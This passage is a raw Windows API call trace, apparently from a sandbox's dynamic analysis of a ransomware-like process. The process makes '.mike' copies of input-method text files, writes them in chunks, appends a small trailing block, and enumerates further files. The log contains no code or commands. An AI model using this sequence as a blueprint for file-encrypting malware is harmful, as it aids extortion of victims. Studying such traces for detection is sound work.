GetFileType (hFile=0x284) returned 0x1 [0130.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.579] GetFileType (hFile=0x284) returned 0x1 [0130.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.580] GetFileType (hFile=0x284) returned 0x1 [0130.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.580] GetFileType (hFile=0x284) returned 0x1 [0130.580] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2d220 [0130.581] WriteFile (in: hFile=0x284, lpBuffer=0x2292cf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2292cf8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.581] CloseHandle (hObject=0x284) returned 1 [0130.581] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.581] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.581] GetFileType (hFile=0x284) returned 0x1 [0130.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.581] GetFileType (hFile=0x284) returned 0x1 [0130.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.582] GetFileType (hFile=0x284) returned 0x1 [0130.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.582] GetFileType (hFile=0x284) returned 0x1 [0130.582] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2fa20 [0130.582] WriteFile (in: hFile=0x284, lpBuffer=0x229fd78*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x229fd78*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.774] WriteFile (in: hFile=0x284, lpBuffer=0x22e3bf8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22e3bf8*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0130.775] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", lpFilePart=0x0) returned 0x5f [0130.775] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", dwFileAttributes=0x80) returned 0 [0130.777] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", lpFilePart=0x0) returned 0x5f [0130.777] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", lpFilePart=0x0) returned 0x5f [0130.781] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0130.782] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", lpFilePart=0x0) returned 0x5d [0130.782] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt", lpFilePart=0x0) returned 0x58 [0130.990] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", lpFilePart=0x0) returned 0x5d [0130.990] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", lpFilePart=0x0) returned 0x5d [0130.990] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt", dwFileAttributes=0x80) returned 0 [0130.992] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", lpFilePart=0x0) returned 0x5d [0130.992] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike", lpFilePart=0x0) returned 0x5d [0130.998] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0130.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", lpFilePart=0x0) returned 0x4e [0130.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt", lpFilePart=0x0) returned 0x49 [0131.016] WriteFile (in: hFile=0x284, lpBuffer=0x2236940*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2236940*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0131.017] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", lpFilePart=0x0) returned 0x4e [0131.017] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", lpFilePart=0x0) returned 0x4e [0131.017] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt", dwFileAttributes=0x80) returned 0 [0131.018] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", lpFilePart=0x0) returned 0x4e [0131.019] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike", lpFilePart=0x0) returned 0x4e [0131.020] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x17605320, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1762b480, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.020] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228e0708, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.020] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688296e7, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x688296e7, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xaf1e3ee0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll", cAlternateFileName="")) returned 1 [0131.021] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482a6fb4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x482a6fb4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x77dccedc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x3f54, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceAmharic.txt", cAlternateFileName="")) returned 1 [0131.021] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47eeed6d, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47eeed6d, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x77e3f2fc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x136bf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceArray.txt", cAlternateFileName="")) returned 1 [0131.021] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77e3f2fc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x77e3f2fc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x77ed787c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xef486, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceDaYi.txt", cAlternateFileName="")) returned 1 [0131.021] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f6118a, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47f6118a, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x7821d6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x196b56, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedQuanPin.txt", cAlternateFileName="")) returned 1 [0131.021] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ff9706, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47ff9706, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x782dbd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x160e36, 